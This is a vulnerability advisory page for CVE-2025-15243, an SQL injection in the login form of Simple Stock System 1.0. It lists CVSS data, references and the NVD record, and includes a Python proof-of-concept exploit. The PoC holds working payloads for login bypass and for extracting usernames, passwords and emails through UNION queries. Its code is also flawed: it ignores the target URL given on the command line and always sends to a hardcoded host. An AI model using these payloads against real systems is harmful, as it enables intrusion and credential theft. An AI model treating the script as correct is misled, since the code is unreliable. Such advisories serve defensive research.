CVE-2025-15243

Description

A flaw has been found in code-projects Simple Stock System 1.0. This affects an unknown function of the file /market/login.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:simple_stock_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Simple Stock System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15243 SQL Injection PoC
# Target: code-projects Simple Stock System 1.0
# Endpoint: /market/login.php
# Parameter: Username

import requests
import sys

def exploit_sqli(target_url, payload):
    """Exploit SQL injection vulnerability"""
    login_url = f"{target_url}/market/login.php"
    
    # Prepare malicious payload
    data = {
        'Username': payload,
        'Password': 'anything'  # Can be anything
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

def basic_auth_bypass():
    """Basic authentication bypass using SQL injection"""
    payload = "admin' OR '1'='1 -- -"
    return exploit_sqli('http://target.com', payload)

def union_based_injection():
    """Union-based SQL injection to extract data"""
    payload = "' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -"
    return exploit_sqli('http://target.com', payload)

def extract_users():
    """Extract user credentials from database"""
    payload = "' UNION SELECT username,password,email,NULL,NULL FROM users-- -"
    return exploit_sqli('http://target.com', payload)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15243.py <target_url>")
        print("Example: python cve-2025-15243.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2025-15243 on {target}")
    
    # Test basic injection
    result = basic_auth_bypass()
    if result:
        print("[+] Payload sent successfully")
        print("[*] Check if authentication was bypassed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15243
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15243
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15243/
[4] VulDB https://vuldb.com/cve/CVE-2025-15243
[5] https://code-projects.org/
[6] https://github.com/c13641462064-lgtm/sql_injection/issues/1
[7] https://vuldb.com/?ctiid.338633
[8] https://vuldb.com/?id.338633
[9] https://vuldb.com/?submit.725689

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15243", "sourceIdentifier": "[email protected]", "published": "2025-12-30T10:15:52.137", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Simple Stock System 1.0. This affects an unknown function of the file /market/login.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:simple_stock_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A63A1F8-39AA-4637-B265-651E4E38EF45"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/c13641462064-lgtm/sql_injection/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.338633", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338633", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725689", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}